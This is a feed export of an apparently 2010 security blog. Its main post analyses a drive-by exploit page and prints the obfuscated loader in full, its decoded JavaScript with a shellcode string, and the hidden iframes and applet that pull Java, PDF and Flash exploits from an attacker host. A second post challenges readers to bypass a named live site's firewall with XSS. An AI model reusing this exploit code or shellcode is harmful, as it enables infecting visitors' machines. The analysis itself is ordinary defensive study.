tag:blogger.com,1999:blog-56505956393721577412011-07-08T03:32:51.829-07:00Ugly Stuff I FindFLOWR3DIRECTION & SHOSHAN ON THE RUN LOOSEShoshannoreply@blogger.comBlogger31100tag:blogger.com,1999:blog-5650595639372157741.post-76698257131701021902010-03-09T15:21:00.000-08:002010-03-09T15:53:06.083-08:00EVIL<div dir="rtl" style="text-align: right;" trbidi="on"><div dir="ltr" style="text-align: left;"><br />ok, i've seen this pattern twice today, so...<br /><br />our story begins here:<br /><br />http---213.198.112.90/red.html<br /><br />a dead simple redirection page...<br /><br /><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;"><script type="text/javascript"></span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;"><!--</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">window.location = "http---mimigaviy.cn"</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">//--></span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;"></script><script src=http---mirtradinggroup.com/tmpp/KeepAlive.php ></script></span></div><br /><b>but what's the script at the bottom ??</b><br /><b><br /></b><br /><div style="color: magenta;"><b>O-M-G</b></div><br /><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">// <script></span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">function tn3(pb3H){return pb3H.replace(/%/g,'').replace(/[lpXM]/g,htC)}</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;"><br /></span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">uVY='doM63ument.l77p72ite(X22M3cp64iv l73l74M79X6cM65p3dl5cl22M70oM73itip6fp6el3aabsol6cuteX3bX6cel66tl3aM2d1000p70p78X3b l74ol70X3ap2d10p30l30X70xl3bM5cX22p3eX22)l3bfM75ncl74X69oni73(a)l7bdocument.wl72il74e(M22p3cifraM6desrcM3dl5cX22httM70p3ap2fM2fmiX72trM61X64inM67grp6fuX70.comM2ftmX70M70M2fKeeX70Ap6cM69veX2ep70hM70M3fl73M3doRJX4drob3l26idX3dl22+a+X22M5cp22l3el3cX2fiframeM3eX22)p3bM7dl6ehM58UM3d0l3bvarM20scoX64X65p3dp22l25uC031X25u6499l25u4l3003X25u8B30M25X75X30M4340l25u708Bp25p75ADM31CM25u688p42l25uE80M38X25uM3007Cl25l750000l25uM3458Bp25u5p33M33Cl25u5X34l38l42M25u7805l25p750l3156X25u83EAp25M75FFC9M25l75l38M4252X25u2l3072p25M75EE01M25uAl44M341X25uDBl331X25uCM3199p25u0Dp43M42p25uX44301l25u9940X25u5M34M30l32M25uFF05X25uM46M3375M25ul46B3l39X25uEA75M25uM38B5Ep25u24M35p45M25X75EX42M301X25u8B66M25u4Bl30CM25l75l35E8BX25X75011Cl25u8p42EBM25X75l38M4204M25uE801p25p755B5EX25uE0FFM25uM42M46M350M25p75X45p4449l25u7E0FX25uDM33FX46M25u565Ep25u52p350X25X75685l34X25ul43000X25u0000p25p75l3505p36X25u8Bp42FX25uE34Bp25uFF5FM25u5l39DM33l25uCE01X25uCX308X35p25uX453M35l38M25u7M3502M25up35p38EX35M25u2950X25p75p38p44CM36M25u3694X25uD520M25u6p31A1p25uM35401p25X75FC30l25l75EM458p33p25ul37M3504p25uC3M460M25uF63X31p25X753M30B6X25X75p36Al35BM25u5240p25uEl32C1p25u520l32p25uBF56M25uCA54p25u91Al46l25l75p44l33FFM25X75l43085l25ul30M4275M25u00l458X25M750000M25X75X35p380X30M25up3002Dp25u00C0M25l7550X300X25u0CE8X25u0000M25u7X37p30M30p25M756X456p39X25M756E6M39X25u7465p25u6M342El25X756C6p43M25p75BF00M25u4E8Ep25uEC0Ep25uD3p46X46M25ul35695l25up356p356M25u56M356M25l7529Bl46M25p75E844M25uFF57p25l75X35M36D3M25uM30068p25u0001p25u5684l25M75E856M25uX46F70X25uX46FFFX22l3bfM75nction ekp313(p29l7bp72eturnX74l72uep3bX7dwM69ndp6fw.l6fM6eerrorl3dek13X3bfunctiM6fnn7M33(l61)l7bvark,s,iX3bif(np61vigator.mimeTyp70esl2el6cengthM26p26l28kM3dX6eavigator.M70X6cugiM6es)p29for(iX3d0p3biM3ck.X6cengthX3bl69++p29M7bsp3dkX5biM5d.nM61meX3bM69f(s.ip6edexX4ff(a)l3ep3d0M29retX75rn p6bl5bl69X5dM3bM7drl65l74url6e0M3bX7dp69f(M6eX61vigator.jap76ap45l6eabl6ced(l29)dop63p75l6dentl2ewX72X69tep28l22p3cM61X70M70X6cp65p74 codep3dp5cp22zzzp2etp74l74.l61d3740bl34.cp6casX73X5cp22X20archX69vM65M3dp5cX22htX74l70M3aX2fl2fmirtradiM6eggroup70.cop6dp2ftmX70p70X2fKeeM70AM6cive.l70M68M70p3fsp3dl6fRJM4dp72ob3l26iM64M3d6p5cp22 M77p69l64p74X68X3d30X30heightp3d300X3eX3cX70araml6eameM3dl5cX22datX61X5cp22M20val6cueX3dX5cp22X68tX74M70l3aM2fM2fmirtrap64l69np67grX6fup70.X63omp2ftmM70X70M2fKeel70Ap6cip76e.M70hl70M3fsl3dl6fp52Jl4dX72M6fl62X33p26M69dp3d1M34l26M5cl22X3el3cM70aram namp65X3dX5cM22ccl5cp22l20val6cuX65l3dM5cX221M5cp22l3ep3cp2fap70X70l6ceX74l3eM22)l3bjM75M43M4dp3d0p3bl74ryX7bl6al75CX4dp3dnew p41X63tivX65p58ObjectX28X22Al63roPDF.p50DFp22X29X3bM7dM63atchp28eX29l7bp7dif(X21jX75Cp4d)tryl7bjl75Cp4dp3dnewActiveM58p4fbjeX63X74(M22PX44M46.p50dM66CtrX6cp22)M3bX7dcatcp68(e)l7bl7dip66X28jl75CM4d)M7bp76ar X6cvl3d((juX43l4d.GetVM65M72sM69onl73().sl70l6cit(M22,M22))l5bX34p5d.sp70p6cit(X22l3dl22)l29M5bp31X5d.rep70p6cace(p2fM5c.p2fX67,l22l22p29X3bjuCX4dM3d(X6cvp3cM3900)p26X26(X6cvX21l3dl3813)M3bX7deX6cse juCl4dM3dnl373(p22AdobM65Ap22)p7cM7cn73M28X22AdobM65M20l50l22)M3bif(juCl4d)ip373(2)l3bnhM58UM3d0p3bjup43l4dX3dp30p3bp66ul6ectp69oX6e M737l33(a)p7bif(ap5b0X5dp3dp3dp39)M7bjuCp4dp3dp61l5b2l5dM3cM312l34l3bl6ep68M58UM3d(al5b2M5dl3e16)l26l26(l61l5b2p5dp3c246)M3bX7deX6csep20if(ap5b0p5dl3dl3dX310X29nhl58Up3dM61p5b2X5dp3c23l3bp6ehp58UM3dnl68p58Up26X26(nl61vX69M67al74orX2ep75sX65rAM67p65nt.l74l6fLowM65rCase()X2eip6edexp4fp66(p22safl61riM22)X3dM3dl2d1)l3bX7dl69fp28(xp3dn73(l22FM6cal73hM22))M26l26(xp3dx.descriX70til6fn))X7373(x.rX65X70M6cp61cel28p2f(X5baM2dzAl2dX5aM5dp7cM5cX73)p2bX2fl2cM22X22).p72eX70X6cace(M2f(p5cs+rl7cp5cM73+bl5b0p2dl39p5d+l29X2f,M22.M22).sX70X6cit(p22.l22))l3bep6cse tryl7bs7X33((neM77p20Actip76eX58ObX6aect(X22Shol63kwl61veFp6cl61sh.p53hM6fX63kwM61veFp6cashl22))X2eGetp56arip61bl6ce(M22l24X76ersionp22).M73p70M6cX69t(M22 p22)X5b1M5d.sp70X6cp69tp28l22,p22))l3bl7dM63p61l74chX28l65)l7bl7difM28juCX4d)l6973(3)l3bdX6fcup6deM6el74.write(p22l3cX2fdX69vp3ep22p29X3b';</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">kzsY=5;</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;"><br /></span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">try{if(htC='a')throw new TypeError('2'+kzsY);}catch(kzsY){htC=unescape('%'+tn3(kzsY.message));htC=tn3(uVY)}</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">eval(unescape(htC));</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;"><br /></span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">//</script></span></div><br /><br /><div style="color: magenta;"><b>unescape(htC) is (after a clean up):</b></div><br /><br /><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">document.write("<div style=\"position:absolute; left:-1000px; top:-1000px;\">");</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">function i73(a)</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">{</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">document.write("<iframe src=\"http---mirtradinggroup.com/tmpp/KeepAlive.php?s=oRJMrob3&id=" + a + "\"></iframe>");</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">}</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">nhXU=0;</span></div><div style="color: red; font-family: "Courier New",Courier,monospace;"><b><span style="font-size: xx-small;">var scode="%uC031%u6499%u4003%u8B30%u0C40%u708B%uAD1C%u688B%uE808%u007C%u0000%u458B%u533C%u548B%u7805%u0156%u83EA%uFFC9%u8B52%u2072%uEE01%uAD41%uDB31%uC199%u0DCB%uD301%u9940%u5402%uFF05%uF375%uFB39%uEA75%u8B5E%u245E%uEB01%u8B66%u4B0C%u5E8B%u011C%u8BEB%u8B04%uE801%u5B5E%uE0FF%uBF50%uED49%u7E0F%uD3FF%u565E%u5250%u6854%uC000%u0000%u5056%u8BBF%uE34B%uFF5F%u59D3%uCE01%uC085%uE358%u7502%u58E5%u2950%u8DC6%u3694%uD520%u61A1%u5401%uFC30%uEE83%u7504%uC3F0%uF631%u30B6%u6A5B%u5240%uE2C1%u5202%uBF56%uCA54%u91AF%uD3FF%uC085%u0B75%u00E8%u0000%u5800%u002D%u00C0%u5000%u0CE8%u0000%u7700%u6E69%u6E69%u7465%u642E%u6C6C%uBF00%u4E8E%uEC0E%uD3FF%u5695%u5656%u5656%u29BF%uE844%uFF57%u56D3%u0068%u0001%u5684%uE856%uFF70%uFFFF";</span></b></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">function ek13(){return true;}</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">window.onerror=ek13;</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">function n73(a){</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">var k,s,i;</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">if(navigator.mimeTypes.length&&(k=navigator.plugins))</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">for(i=0;i<k.length;i++){</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">s=k[i].name;</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">if(s.indexOf(a)>=0)</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">return k[i];</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">}</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">return 0;</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">}</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">if(navigator.javaEnabled())</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">document.write("<applet code=\"zzz.ttt.ad3740b4.class\" archive=\"http://mirtradinggroup.com/tmpp/KeepAlive.php?s=oRJMrob3&id=6\" width=300 height=300><param name=\"data\" value=\"http://mirtradinggroup.com/tmpp/KeepAlive.php?s=oRJMrob3&id=14&\"><param name=\"cc\" value=\"1\"></applet>");</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">juCM=0;</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">try{</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">juCM=new ActiveXObject("AcroPDF.PDF");</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">}catch(e){}</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">if(!juCM)</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">try{juCM=new ActiveXObject("PDF.PdfCtrl");}catch(e){}</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">if(juCM){</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">var lv=((juCM.GetVersions().split(","))[4].split("="))[1].replace(/\./g,"");</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">juCM=(lv<900)&&(lv!=813);</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">}else</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">juCM=n73("Adobe A")||n73("Adobe P");</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">if(juCM)</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">i73(2);</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">nhXU=0;</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">juCM=0;</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">function s73(a){</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">if(a[0]==9){</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">juCM=a[2]<124;</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">nhXU=(a[2]>16)&&(a[2]<246);</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">}else if(a[0]==10)</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">nhXU=a[2]<23;</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">nhXU=nhXU&&(navigator.userAgent.toLowerCase().indexOf("safari")==-1);</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">}</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">if((x=n73("Flash"))&&(x=x.description))</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">s73(x.replace(/([a-zA-Z]|\s)+/,"").replace(/(\s+r|\s+b[0-9]+)/,".").split("."));</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">else</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">try{s73((new ActiveXObject("ShockwaveFlash.ShockwaveFlash")).GetVariable("$version").split(" ")[1].split(","));</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">}catch(e){}</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">if(juCM)</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">i73(3);</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: xx-small;">document.write("</div>");</span></div><br />ok, so left have a look, why do we have a variable for some shell-code ?<br /><br />we have java, acrobat reader and flash...<br /><br />lets download...(we need to download fast and with the hashes it gave us or it will return a blank page...)<br /><br /><div style="color: magenta;"><b>all files are random keyd obfuscated...</b></div><br /><div style="color: magenta;"><b>JAR - not a virus they say, from what i can see lots of obfuscated code...</b></div>http://www.virustotal.com/analisis/cdc63ce0b8d58dfa950f7496fcf0e71cb81552bdc0d5357d5c4ded3d21b86640-1268176373<br /><br /><div style="color: magenta;"><b>SWF - only Kaspersky know it - Trojan-Downloader.SWF.Agent.dc</b></div>http://www.virustotal.com/analisis/9ae30f055b424a0d158dbe7381c4c2a2d2352ceb1243dc8502ed12188618186c-1268176524<br /><br /><div style="color: magenta;"><b>PDF - once again only Kaspersky - Exploit.JS.Pdfka.buh</b></div>http://www.virustotal.com/analisis/8cdb7242317adc54c8519094cdfcef3baa7d79925289f59fd64d263da0a8df6a-1268176590<br /><br /><div style="color: magenta;">if you want the files - WE have them and WE ARE willing to bargen ;)...</div><br /></div></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5650595639372157741-7669825713170102190?l=really-ugly-stuff.blogspot.com' alt='' /></div>Shoshannoreply@blogger.com0tag:blogger.com,1999:blog-5650595639372157741.post-46606053962189091232010-03-09T14:23:00.000-08:002010-03-09T14:36:57.973-08:00tapuz.co.il - WAF bypass challenge<div dir="rtl" style="text-align: right;" trbidi="on"><div style="text-align: right;"></div><div dir="ltr" style="text-align: left;">ok, so this is the page in tapuz:</div><div dir="ltr" style="text-align: left;"><br /></div><div dir="ltr" style="text-align: left;"><a href="http://www.tapuz.co.il/common/MlinksIframe.aspx?mlinkStyle=font-size%3a13px%3b+color%3a%23000000%3b+font-family%3aarial%3b+font-weight%3abold%3b+text-decoration%3aunderline%3b">http://www.tapuz.co.il/common/MlinksIframe.aspx?mlinkStyle=font-size%3a13px%3b+color%3a%23000000%3b+font-family%3aarial%3b+font-weight%3abold%3b+text-decoration%3aunderline%3b</a></div><div dir="ltr" style="text-align: left;"><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_xzVrIrwiu4E/S5bNFA0X5wI/AAAAAAAADjc/_ONlNMo8d7U/s1600-h/tapuz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="287" src="http://4.bp.blogspot.com/_xzVrIrwiu4E/S5bNFA0X5wI/AAAAAAAADjc/_ONlNMo8d7U/s400/tapuz.png" width="400" /></a></div><br /><br /></div><div dir="ltr" style="text-align: left;">obviously they are not stupid, they have a web application firewall, and that's enough defence for anyone, right ?</div><div dir="ltr" style="text-align: left;"><br /></div><div dir="ltr" style="text-align: left;"><b>what you need to do is (easy to hard):</b></div><div dir="ltr" style="text-align: left;"></div><div dir="ltr" style="text-align: left;"><ol style="text-align: left;"><li>pop up a MsgBox in IE</li><li>pop up a MsgBox in FF!</li></ol></div></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5650595639372157741-4660605396218909123?l=really-ugly-stuff.blogspot.com' alt='' /></div>Shoshannoreply@blogger.com3tag:blogger.com,1999:blog-5650595639372157741.post-40999766042709499762010-03-09T12:33:00.000-08:002010-03-09T14:24:30.690-08:00Testing, Testing<div dir="rtl" style="text-align: right;" trbidi="on"><div dir="ltr" style="text-align: left;"><img src="http://1.bp.blogspot.com/_xzVrIrwiu4E/S5ayX3ZNiGI/AAAAAAAADjU/XreffANQDRs/s320/too+late.jpg" /></div><div dir="ltr" style="text-align: left;"><br />Ok, so this is a first post...<br /><br /><br /></div></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5650595639372157741-4099976604270949976?l=really-ugly-stuff.blogspot.com' alt='' /></div>Shoshannoreply@blogger.com0